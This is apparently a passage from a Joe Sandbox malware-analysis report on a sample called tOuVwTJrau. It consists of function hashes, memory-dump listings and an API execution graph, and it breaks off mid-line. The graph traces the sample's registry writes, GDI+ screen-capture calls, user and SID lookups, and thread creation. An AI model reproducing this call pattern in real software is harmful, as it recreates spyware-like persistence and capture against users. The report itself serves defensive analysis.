                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID: `&0
                                                                • API String ID: 593203224-1385275834
                                                                • Opcode ID: efffb27b05e575e43093cc407649742e3fae8b2305425ef01e5692f201019c31
                                                                • Instruction ID: de6d6935859d126ab71cdcb5a03422345dbbbb5224052334d4f40ffbce9e76f9
                                                                • Opcode Fuzzy Hash: efffb27b05e575e43093cc407649742e3fae8b2305425ef01e5692f201019c31
                                                                • Instruction Fuzzy Hash: 8D014C39601114AFCB06DB14C8A5E9DBBB9EF94710F1540AAE8019B2A1DF70EE41CAA0
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0030A0E4
                                                                • ___raise_securityfailure.LIBCMT ref: 0030A1A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                • String ID: S]1
                                                                • API String ID: 3761405300-3480251096
                                                                • Opcode ID: 77f06915d17420f1f26b3dd0d627db3e6beabfb368df7dc65412b5ddddfc2486
                                                                • Instruction ID: 0b7436f072a9bb2232a678d3ea57b9c8264ee38a68601a914eff7cba5f1a1c17
                                                                • Opcode Fuzzy Hash: 77f06915d17420f1f26b3dd0d627db3e6beabfb368df7dc65412b5ddddfc2486
                                                                • Instruction Fuzzy Hash: 85119DBC514204DED706DF19FC817867BB9BB1A344F00911BE9098F3A0EBB0A549CF55
                                                                APIs
                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,00317562,-00000020,00000FA0,00000000,0034447C,00000000), ref: 00318E89
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: CountCriticalInitializeSectionSpin
                                                                • String ID: InitializeCriticalSectionEx$`&0
                                                                • API String ID: 2593887523-1897320756
                                                                • Opcode ID: 47a151e36b17532f906c72a122c13068a7df9e695c1b506e385d7ce90adaaa3e
                                                                • Instruction ID: be4220d6a237515ae6d5c64422d2a9b7bdb26e71a6cb2f877d30ef93f04b4fe4
                                                                • Opcode Fuzzy Hash: 47a151e36b17532f906c72a122c13068a7df9e695c1b506e385d7ce90adaaa3e
                                                                • Instruction Fuzzy Hash: 0CE09235240218B7CB172F41EC45CDF3F19EB447A0F088820FE0859161CBB14960ABD4
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Alloc
                                                                • String ID: FlsAlloc$`&0
                                                                • API String ID: 2773662609-1144036073
                                                                • Opcode ID: 8530b24408c5d3ed10a06ce89b0fddbe7a2c56fe708464edc452bc249ec84d3b
                                                                • Instruction ID: 5c61827c03271f6fa485a8cd8cd4566e5b1d36b0cbf34e5bc396690488d34744
                                                                • Opcode Fuzzy Hash: 8530b24408c5d3ed10a06ce89b0fddbe7a2c56fe708464edc452bc249ec84d3b
                                                                • Instruction Fuzzy Hash: AEE0C2356C4324B382172791AC86ADA79488B54BB1F044011FD04962A0DDA0094181DD
                                                                APIs
                                                                • GetSystemTimePreciseAsFileTime.KERNEL32(?,0030977F,?,00000003,00000003,?,003097B4,?,?,?,00000003,00000003,?,00309258,/.,00000001), ref: 00309AB0
                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,0030977F,?,00000003,00000003,?,003097B4,?,?,?,00000003,00000003,?,00309258), ref: 00309AB4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Time$FileSystem$Precise
                                                                • String ID: `&0
                                                                • API String ID: 743729956-1385275834
                                                                • Opcode ID: c0a53a94d56ba1009faef9a2e0733ba6c3a4a49bea99f942852bf579ba0ec3b9
                                                                • Instruction ID: b5ef891fe929a466e12a3a9c3e168580d067153a8569f8402094a39b4f5a52f2
                                                                • Opcode Fuzzy Hash: c0a53a94d56ba1009faef9a2e0733ba6c3a4a49bea99f942852bf579ba0ec3b9
                                                                • Instruction Fuzzy Hash: 8ED0223A7020389BCB032B80FC045ADBBADEE09B21F080013E90987223CFA12C108BC0

                                                                Execution Graph

                                                                Execution Coverage:6.3%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:1440
                                                                Total number of Limit Nodes:26
                                                                execution_graph 30687 11a963 30688 11ab06 30687->30688 30690 11a98d 30687->30690 30724 111652 14 API calls __dosmaperr 30688->30724 30690->30688 30693 11a9d8 30690->30693 30692 11ab23 30708 11f2a0 30693->30708 30697 11aa0c 30698 11ab25 30697->30698 30715 11e985 25 API calls 2 library calls 30697->30715 30732 10f436 IsProcessorFeaturePresent 30698->30732 30701 11aa1e 30701->30698 30716 11e9b1 30701->30716 30702 11ab31 30704 11aa30 30704->30698 30705 11aa39 30704->30705 30706 11aaf1 30705->30706 30723 11f2fd 25 API calls 2 library calls 30705->30723 30725 109db0 30706->30725 30709 11f2ac __FrameHandler3::FrameUnwindToState 30708->30709 30710 11a9f8 30709->30710 30736 112ae0 EnterCriticalSection 30709->30736 30714 11e959 25 API calls 2 library calls 30710->30714 30712 11f2bd 30737 11f2f4 LeaveCriticalSection std::_Lockit::~_Lockit 30712->30737 30714->30697 30715->30701 30717 11e9d2 30716->30717 30718 11e9bd 30716->30718 30717->30704 30738 111652 14 API calls __dosmaperr 30718->30738 30720 11e9c2 30739 10f409 25 API calls __fread_nolock 30720->30739 30722 11e9cd 30722->30704 30723->30706 30724->30706 30726 109db8 30725->30726 30727 109db9 IsProcessorFeaturePresent 30725->30727 30726->30692 30729 109fe8 30727->30729 30740 109fa8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 30729->30740 30731 10a0cb 30731->30692 30733 10f442 30732->30733 30741 10f25d 30733->30741 30736->30712 30737->30710 30738->30720 30739->30722 30740->30731 30742 10f279 __fread_nolock __FrameHandler3::FrameUnwindToState 30741->30742 30743 10f2a5 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 30742->30743 30746 10f376 __FrameHandler3::FrameUnwindToState 30743->30746 30744 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 30745 10f394 GetCurrentProcess TerminateProcess 30744->30745 30745->30702 30746->30744 30747 110a22 30748 110a30 30747->30748 30749 110a3e 30747->30749 30751 110a94 57 API calls 30748->30751 30760 10ed09 30749->30760 30753 110a3a 30751->30753 30757 110a6c 30758 110a8e 30757->30758 30791 1185a6 30757->30791 30797 10e5e7 30760->30797 30764 10ed2d 30765 10ecec 30764->30765 30809 10ec3a 30765->30809 30768 110a94 30769 110aa2 30768->30769 30770 110abf __fread_nolock 30768->30770 30860 11163f 14 API calls __dosmaperr 30769->30860 30774 110b01 CreateFileW 30770->30774 30775 110ae5 30770->30775 30772 110aa7 30861 111652 14 API calls __dosmaperr 30772->30861 30776 110b33 30774->30776 30777 110b25 30774->30777 30863 11163f 14 API calls __dosmaperr 30775->30863 30866 110b72 49 API calls __dosmaperr 30776->30866 30834 110bfc GetFileType 30777->30834 30778 110aaf 30862 10f409 25 API calls __fread_nolock 30778->30862 30783 110aea 30864 111652 14 API calls __dosmaperr 30783->30864 30784 110aba 30784->30757 30786 110af1 30865 10f409 25 API calls __fread_nolock 30786->30865 30787 110b2e __fread_nolock 30789 110b64 CloseHandle 30787->30789 30790 110afc 30787->30790 30789->30790 30790->30757 30792 1185b1 HeapFree 30791->30792 30793 1185da __dosmaperr 30791->30793 30792->30793 30794 1185c6 30792->30794 30793->30758 30892 111652 14 API calls __dosmaperr 30794->30892 30796 1185cc GetLastError 30796->30793 30798 10e607 30797->30798 30799 10e5fe 30797->30799 30798->30799 30806 1171c0 37 API calls 3 library calls 30798->30806 30799->30764 30805 118bff 5 API calls std::_Lockit::_Lockit 30799->30805 30801 10e627 30807 1179e6 37 API calls __Getctype 30801->30807 30803 10e63d 30808 117a13 37 API calls __fassign 30803->30808 30805->30764 30806->30801 30807->30803 30808->30799 30810 10ec62 30809->30810 30811 10ec48 30809->30811 30813 10ec88 30810->30813 30814 10ec69 30810->30814 30827 10ed48 14 API calls _free 30811->30827 30829 118823 MultiByteToWideChar 30813->30829 30826 10ec52 30814->30826 30828 10ed62 15 API calls __wsopen_s 30814->30828 30817 10ec9e GetLastError 30830 11161c 14 API calls __dosmaperr 30817->30830 30819 10ec97 30819->30817 30825 10ecc4 30819->30825 30832 10ed62 15 API calls __wsopen_s 30819->30832 30820 10ecaa 30831 111652 14 API calls __dosmaperr 30820->30831 30823 10ecdb 30823->30817 30823->30826 30825->30826 30833 118823 MultiByteToWideChar 30825->30833 30826->30757 30826->30768 30827->30826 30828->30826 30829->30819 30830->30820 30831->30826 30832->30825 30833->30823 30835 110c37 30834->30835 30836 110ce9 30834->30836 30837 110c51 __fread_nolock 30835->30837 30884 110f72 21 API calls __dosmaperr 30835->30884 30838 110d15 30836->30838 30840 110cf3 30836->30840 30842 110ce0 30837->30842 30843 110c70 GetFileInformationByHandle 30837->30843 30841 110d3f PeekNamedPipe 30838->30841 30838->30842 30844 110cf7 30840->30844 30845 110d06 GetLastError 30840->30845 30841->30842 30846 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 30842->30846 30843->30845 30847 110c86 30843->30847 30886 111652 14 API calls __dosmaperr 30844->30886 30887 11161c 14 API calls __dosmaperr 30845->30887 30850 110d6a 30846->30850 30867 110ec4 30847->30867 30850->30787 30855 110d6c 7 API calls 30856 110cb6 30855->30856 30857 110d6c 7 API calls 30856->30857 30858 110ccd 30857->30858 30885 110e91 14 API calls __dosmaperr 30858->30885 30860->30772 30861->30778 30862->30784 30863->30783 30864->30786 30865->30790 30866->30787 30868 110eda 30867->30868 30871 110c92 30868->30871 30888 10e6f6 38 API calls 3 library calls 30868->30888 30870 110f1e 30870->30871 30889 10e6f6 38 API calls 3 library calls 30870->30889 30877 110d6c 30871->30877 30873 110f2f 30873->30871 30890 10e6f6 38 API calls 3 library calls 30873->30890 30875 110f40 30875->30871 30891 10e6f6 38 API calls 3 library calls 30875->30891 30878 110d92 FileTimeToSystemTime 30877->30878 30879 110d84 30877->30879 30880 110da4 SystemTimeToTzSpecificLocalTime 30878->30880 30881 110d8a 30878->30881 30879->30878 30879->30881 30880->30881 30882 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 30881->30882 30883 110ca3 30882->30883 30883->30855 30884->30837 30885->30842 30886->30842 30887->30842 30888->30870 30889->30873 30890->30875 30891->30871 30892->30796 30893 1177a2 30898 117578 30893->30898 30896 1177e1 30899 117597 30898->30899 30900 1175aa 30899->30900 30908 1175bf 30899->30908 30918 111652 14 API calls __dosmaperr 30900->30918 30902 1175af 30919 10f409 25 API calls __fread_nolock 30902->30919 30904 1175ba 30904->30896 30915 123e6f 30904->30915 30906 117790 30924 10f409 25 API calls __fread_nolock 30906->30924 30908->30908 30913 1176df 30908->30913 30920 1236fe 37 API calls 2 library calls 30908->30920 30910 11772f 30910->30913 30921 1236fe 37 API calls 2 library calls 30910->30921 30912 11774d 30912->30913 30922 1236fe 37 API calls 2 library calls 30912->30922 30913->30904 30923 111652 14 API calls __dosmaperr 30913->30923 30925 123834 30915->30925 30918->30902 30919->30904 30920->30910 30921->30912 30922->30913 30923->30906 30924->30904 30926 123840 __FrameHandler3::FrameUnwindToState 30925->30926 30927 123847 30926->30927 30930 123872 30926->30930 30945 111652 14 API calls __dosmaperr 30927->30945 30929 12384c 30946 10f409 25 API calls __fread_nolock 30929->30946 30936 123e01 30930->30936 30935 123856 30935->30896 30937 10ed09 __wsopen_s 37 API calls 30936->30937 30938 123e23 30937->30938 30939 10ecec __wsopen_s 17 API calls 30938->30939 30940 123e30 30939->30940 30941 123e37 30940->30941 30948 123e8f 30940->30948 30943 1185a6 _free 14 API calls 30941->30943 30944 123896 30941->30944 30943->30944 30947 1238c9 LeaveCriticalSection __wsopen_s 30944->30947 30945->30929 30946->30935 30947->30935 30949 123eac 30948->30949 30950 123ec1 30949->30950 30951 123eda 30949->30951 31008 11163f 14 API calls __dosmaperr 30950->31008 30994 11a755 30951->30994 30954 123ec6 31009 111652 14 API calls __dosmaperr 30954->31009 30956 123ee8 31010 11163f 14 API calls __dosmaperr 30956->31010 30957 123eff 31007 123b48 CreateFileW 30957->31007 30961 123eed 31011 111652 14 API calls __dosmaperr 30961->31011 30963 123fb5 GetFileType 30965 123fc0 GetLastError 30963->30965 30966 124007 30963->30966 30964 123f8a GetLastError 31013 11161c 14 API calls __dosmaperr 30964->31013 31014 11161c 14 API calls __dosmaperr 30965->31014 31016 11a6a0 15 API calls 2 library calls 30966->31016 30967 123f38 30967->30963 30967->30964 31012 123b48 CreateFileW 30967->31012 30971 123fce CloseHandle 30971->30954 30974 123ff7 30971->30974 30973 123f7d 30973->30963 30973->30964 31015 111652 14 API calls __dosmaperr 30974->31015 30975 124028 30977 124074 30975->30977 31017 123d57 71 API calls 3 library calls 30975->31017 30982 12407b 30977->30982 31019 1238f5 71 API calls 4 library calls 30977->31019 30978 123ffc 30978->30954 30981 1240a9 30981->30982 30983 1240b7 30981->30983 31018 1186f9 28 API calls 2 library calls 30982->31018 30984 123ed3 30983->30984 30986 124133 CloseHandle 30983->30986 30984->30941 31020 123b48 CreateFileW 30986->31020 30988 12415e 30989 124168 GetLastError 30988->30989 30993 124082 30988->30993 31021 11161c 14 API calls __dosmaperr 30989->31021 30991 124174 31022 11a868 15 API calls 2 library calls 30991->31022 30993->30984 30995 11a761 __FrameHandler3::FrameUnwindToState 30994->30995 31023 112ae0 EnterCriticalSection 30995->31023 30997 11a768 30998 11a78d 30997->30998 31003 11a7fc EnterCriticalSection 30997->31003 31005 11a7af 30997->31005 31027 11a52f 15 API calls 3 library calls 30998->31027 31002 11a792 31002->31005 31028 11a67d EnterCriticalSection 31002->31028 31004 11a809 LeaveCriticalSection 31003->31004 31003->31005 31004->30997 31024 11a85f 31005->31024 31007->30967 31008->30954 31009->30984 31010->30961 31011->30954 31012->30973 31013->30954 31014->30971 31015->30978 31016->30975 31017->30977 31018->30993 31019->30981 31020->30988 31021->30991 31022->30993 31023->30997 31029 112b28 LeaveCriticalSection 31024->31029 31026 11a7cf 31026->30956 31026->30957 31027->31002 31028->31005 31029->31026 31030 10a528 31031 10a534 __FrameHandler3::FrameUnwindToState 31030->31031 31056 10a24e 31031->31056 31033 10a53b 31034 10a694 31033->31034 31045 10a565 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 31033->31045 31080 10a895 4 API calls 2 library calls 31034->31080 31036 10a69b 31081 10e34e 23 API calls __FrameHandler3::FrameUnwindToState 31036->31081 31038 10a6a1 31082 10e312 23 API calls __FrameHandler3::FrameUnwindToState 31038->31082 31040 10a6a9 31041 10a584 31042 10a605 31064 11470b 31042->31064 31044 10a60b 31068 1011a0 31044->31068 31045->31041 31045->31042 31079 10e328 37 API calls 3 library calls 31045->31079 31057 10a257 31056->31057 31083 10aa7f IsProcessorFeaturePresent 31057->31083 31059 10a263 31084 10cb69 10 API calls 2 library calls 31059->31084 31061 10a268 31062 10a26c 31061->31062 31085 10cb88 7 API calls 2 library calls 31061->31085 31062->31033 31065 114714 31064->31065 31066 114719 31064->31066 31086 114266 49 API calls 31065->31086 31066->31044 31087 ec6d0 Sleep CreateMutexA GetLastError 31068->31087 31072 1011b5 31073 f1dd0 120 API calls 31072->31073 31074 1011ba 31073->31074 31075 ff750 147 API calls 31074->31075 31076 1011bf 31075->31076 31077 101150 CreateThread CreateThread CreateThread 31076->31077 31078 101190 Sleep 31077->31078 31414 100f90 31077->31414 31420 101020 31077->31420 31426 1010b0 31077->31426 31078->31078 31079->31042 31080->31036 31081->31038 31082->31040 31083->31059 31084->31061 31085->31062 31086->31066 31088 ec71a 31087->31088 31089 ec709 31087->31089 31094 f1600 31088->31094 31089->31088 31090 ec70d GetLastError 31089->31090 31090->31088 31091 ec71c 31090->31091 31099 10e34e 23 API calls __FrameHandler3::FrameUnwindToState 31091->31099 31093 ec723 31100 103730 31094->31100 31096 f1652 31116 e61f0 31096->31116 31098 f165d 31099->31093 31101 10375b 31100->31101 31102 103762 31101->31102 31103 1037b4 31101->31103 31104 103795 31101->31104 31102->31096 31112 1037a9 _Yarn 31103->31112 31280 10a1a8 31103->31280 31105 1037ea 31104->31105 31106 10379c 31104->31106 31294 e25c0 27 API calls 2 library calls 31105->31294 31108 10a1a8 std::_Facet_Register 27 API calls 31106->31108 31110 1037a2 31108->31110 31110->31112 31295 10f419 31110->31295 31112->31096 31314 e5da0 31116->31314 31122 e62e9 shared_ptr 31124 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 31122->31124 31123 e630f 31125 10f419 25 API calls 31123->31125 31127 e630b 31124->31127 31128 e6314 __fread_nolock 31125->31128 31126 e625f shared_ptr 31126->31122 31126->31123 31127->31098 31129 e6377 RegOpenKeyExA 31128->31129 31130 e63a6 RegQueryValueExA 31129->31130 31131 e63d0 RegCloseKey 31129->31131 31130->31131 31132 e6400 31131->31132 31132->31132 31329 104640 31132->31329 31134 e6480 shared_ptr 31135 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 31134->31135 31138 e64a3 31135->31138 31136 e64a7 31139 10f419 25 API calls 31136->31139 31137 e6418 shared_ptr 31137->31134 31137->31136 31138->31098 31140 e64ac RegOpenKeyExA 31139->31140 31142 e64ed RegSetValueExA 31140->31142 31143 e6517 RegCloseKey 31140->31143 31142->31143 31144 e6528 shared_ptr 31143->31144 31145 e65e6 31144->31145 31146 e65ce shared_ptr 31144->31146 31148 10f419 25 API calls 31145->31148 31147 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 31146->31147 31149 e65e2 31147->31149 31150 e65eb 31148->31150 31149->31098 31344 111f87 31150->31344 31153 e6646 RegSetValueExA 31154 e6665 RegCloseKey 31153->31154 31156 e6676 shared_ptr 31154->31156 31155 e6734 31159 10f419 25 API calls 31155->31159 31156->31155 31157 e671c shared_ptr 31156->31157 31158 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 31157->31158 31160 e6730 31158->31160 31161 e6739 __wsopen_s 31159->31161 31160->31098 31162 103730 70 API calls 31161->31162 31163 e67a0 31162->31163 31164 e61f0 74 API calls 31163->31164 31165 e67ab RegOpenKeyExA 31164->31165 31167 e67d9 __fread_nolock shared_ptr 31165->31167 31168 e6d64 31167->31168 31169 e6d80 31167->31169 31172 e6829 RegQueryInfoKeyW 31167->31172 31170 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 31168->31170 31171 10f419 25 API calls 31169->31171 31173 e6d7c 31170->31173 31174 e6d85 GdiplusStartup 31171->31174 31175 e6d58 RegCloseKey 31172->31175 31256 e68a8 shared_ptr 31172->31256 31173->31098 31176 e6e39 31174->31176 31182 e6e13 GetDC 31174->31182 31175->31168 31178 e7534 31176->31178 31179 e6e45 31176->31179 31177 e68b2 RegEnumValueA 31177->31256 31367 e26a0 27 API calls 31178->31367 31348 105ad0 27 API calls std::_Facet_Register 31179->31348 31181 e7539 31184 10f419 25 API calls 31181->31184 31188 103730 70 API calls 31182->31188 31183 104640 27 API calls 31183->31256 31187 e7552 GetUserNameA LookupAccountNameA GetSidIdentifierAuthority 31184->31187 31191 103730 70 API calls 31187->31191 31190 e6f8b 31188->31190 31192 e61f0 74 API calls 31190->31192 31193 e7626 31191->31193 31194 e6f96 31192->31194 31195 e61f0 74 API calls 31193->31195 31196 103730 70 API calls 31194->31196 31197 e7631 31195->31197 31198 e6fb3 31196->31198 31368 e2400 44 API calls 31197->31368 31199 e61f0 74 API calls 31198->31199 31201 e6fba 31199->31201 31202 103730 70 API calls 31201->31202 31203 e6fcf 31202->31203 31204 e61f0 74 API calls 31203->31204 31206 e6fd6 31204->31206 31205 e7649 shared_ptr 31207 e78c3 31205->31207 31209 103730 70 API calls 31205->31209 31212 103730 70 API calls 31206->31212 31208 10f419 25 API calls 31207->31208 31210 e78c8 31208->31210 31211 e76b2 31209->31211 31213 10f419 25 API calls 31210->31213 31214 e61f0 74 API calls 31211->31214 31215 e7002 31212->31215 31216 e78cd 31213->31216 31217 e76bd 31214->31217 31218 e61f0 74 API calls 31215->31218 31219 10f419 25 API calls 31216->31219 31369 e2400 44 API calls 31217->31369 31220 e700d 31218->31220 31221 e78d2 31219->31221 31349 105b30 31220->31349 31224 e7024 31227 105b30 27 API calls 31224->31227 31225 e771a GetSidSubAuthorityCount 31226 e77d2 31225->31226 31249 e7734 shared_ptr 31225->31249 31231 104640 27 API calls 31226->31231 31236 e703b shared_ptr 31227->31236 31228 e76d7 shared_ptr 31228->31210 31228->31225 31229 e7740 GetSidSubAuthority 31230 103730 70 API calls 31229->31230 31230->31249 31232 e7822 31231->31232 31234 104640 27 API calls 31232->31234 31233 e61f0 74 API calls 31233->31249 31238 e786f 31234->31238 31235 e715f shared_ptr 31237 103730 70 API calls 31235->31237 31236->31181 31236->31235 31239 e719f 31237->31239 31238->31216 31240 e789b shared_ptr 31238->31240 31243 e61f0 74 API calls 31239->31243 31244 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 31240->31244 31242 e61f0 74 API calls 31242->31256 31245 e71aa 31243->31245 31246 e78bf 31244->31246 31247 e71b5 RegGetValueA 31245->31247 31248 e71b3 31245->31248 31246->31098 31250 e71e5 shared_ptr 31247->31250 31248->31247 31249->31207 31249->31226 31249->31229 31249->31233 31370 e2400 44 API calls 31249->31370 31251 e722f GetSystemMetrics 31250->31251 31252 e7226 GetSystemMetrics 31250->31252 31255 e7234 31251->31255 31254 e722d 31252->31254 31252->31255 31253 103730 70 API calls 31253->31256 31254->31251 31257 103730 70 API calls 31255->31257 31256->31169 31256->31175 31256->31177 31256->31183 31256->31242 31256->31253 31258 e724f 31257->31258 31259 e61f0 74 API calls 31258->31259 31260 e725a RegGetValueA 31259->31260 31268 e728f shared_ptr 31260->31268 31262 e72ca GetSystemMetrics 31264 e72d8 6 API calls 31262->31264 31265 e72d1 31262->31265 31263 e72d3 GetSystemMetrics 31263->31264 31266 e736b 31264->31266 31267 e73f8 6 API calls 31264->31267 31265->31263 31269 112a89 ___std_exception_copy 15 API calls 31266->31269 31275 e744f shared_ptr 31267->31275 31268->31262 31268->31263 31270 e7371 31269->31270 31270->31267 31272 e7380 GdipGetImageEncoders 31270->31272 31271 e74e0 GdiplusShutdown 31273 e74f1 shared_ptr 31271->31273 31279 e7394 31272->31279 31274 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 31273->31274 31276 e7530 31274->31276 31275->31271 31276->31098 31278 e73ef 31278->31267 31366 112241 14 API calls _free 31279->31366 31283 10a1ad 31280->31283 31282 10a1c7 31282->31112 31283->31282 31285 10a1c9 31283->31285 31300 112a89 31283->31300 31309 113d81 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 31283->31309 31286 e25c0 31285->31286 31287 10a1d3 std::_Facet_Register 31285->31287 31307 10b446 RaiseException 31286->31307 31310 10b446 RaiseException 31287->31310 31290 e25dc 31308 10b1f1 26 API calls 2 library calls 31290->31308 31291 10aa7e 31293 e2603 31293->31112 31294->31110 31313 10f3a5 25 API calls 3 library calls 31295->31313 31297 10f428 31298 10f436 __Getctype 11 API calls 31297->31298 31299 10f435 31298->31299 31305 1187d5 __Getctype 31300->31305 31301 118813 31312 111652 14 API calls __dosmaperr 31301->31312 31302 1187fe RtlAllocateHeap 31304 118811 31302->31304 31302->31305 31304->31283 31305->31301 31305->31302 31311 113d81 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 31305->31311 31307->31290 31308->31293 31309->31283 31310->31291 31311->31305 31312->31304 31313->31297 31371 104500 27 API calls 3 library calls 31314->31371 31316 e5dd1 31317 e6060 31316->31317 31372 104500 27 API calls 3 library calls 31317->31372 31319 e61c6 31322 e51a0 31319->31322 31321 e6095 31321->31319 31373 1107b0 40 API calls __Getctype 31321->31373 31323 e5432 31322->31323 31324 e5204 31322->31324 31323->31126 31325 e5355 31324->31325 31374 1107b0 40 API calls __Getctype 31324->31374 31375 105610 27 API calls 3 library calls 31324->31375 31325->31323 31376 105610 27 API calls 3 library calls 31325->31376 31333 10465e _Yarn 31329->31333 31334 104684 31329->31334 31330 10476e 31377 e26a0 27 API calls 31330->31377 31332 104773 31378 e25c0 27 API calls 2 library calls 31332->31378 31333->31137 31334->31330 31336 1046d8 31334->31336 31337 1046fd 31334->31337 31336->31332 31340 10a1a8 std::_Facet_Register 27 API calls 31336->31340 31339 10a1a8 std::_Facet_Register 27 API calls 31337->31339 31341 1046e9 _Yarn 31337->31341 31338 104778 shared_ptr 31338->31137 31339->31341 31340->31341 31342 104750 shared_ptr 31341->31342 31343 10f419 25 API calls 31341->31343 31342->31137 31343->31330 31345 111fa2 31344->31345 31379 1116b1 31345->31379 31348->31182 31350 105b73 31349->31350 31351 105d00 31350->31351 31352 105c40 31350->31352 31360 105b78 _Yarn 31350->31360 31412 e26a0 27 API calls 31351->31412 31355 105c75 31352->31355 31356 105c9b 31352->31356 31354 105d05 31413 e25c0 27 API calls 2 library calls 31354->31413 31355->31354 31358 105c80 31355->31358 31362 10a1a8 std::_Facet_Register 27 API calls 31356->31362 31365 105c8d _Yarn 31356->31365 31361 10a1a8 std::_Facet_Register 27 API calls 31358->31361 31359 105c86 31363 10f419 25 API calls 31359->31363 31359->31365 31360->31224 31361->31359 31362->31365 31364 105d0f 31363->31364 31365->31224 31366->31278 31368->31205 31369->31228 31370->31249 31371->31316 31372->31321 31373->31321 31374->31324 31375->31324 31376->31325 31378->31338 31397 110537 31379->31397 31381 1116fc 31384 10e5e7 __fassign 37 API calls 31381->31384 31382 1116c3 31382->31381 31383 1116d8 31382->31383 31396 e661c RegOpenKeyExA 31382->31396 31404 111652 14 API calls __dosmaperr 31383->31404 31389 111708 31384->31389 31386 1116dd 31405 10f409 25 API calls __fread_nolock 31386->31405 31390 111737 31389->31390 31406 111f33 40 API calls 2 library calls 31389->31406 31391 1117a1 31390->31391 31407 111edc 25 API calls 2 library calls 31390->31407 31408 111edc 25 API calls 2 library calls 31391->31408 31394 111867 31394->31396 31409 111652 14 API calls __dosmaperr 31394->31409 31396->31153 31396->31154 31398 11053c 31397->31398 31399 11054f 31397->31399 31410 111652 14 API calls 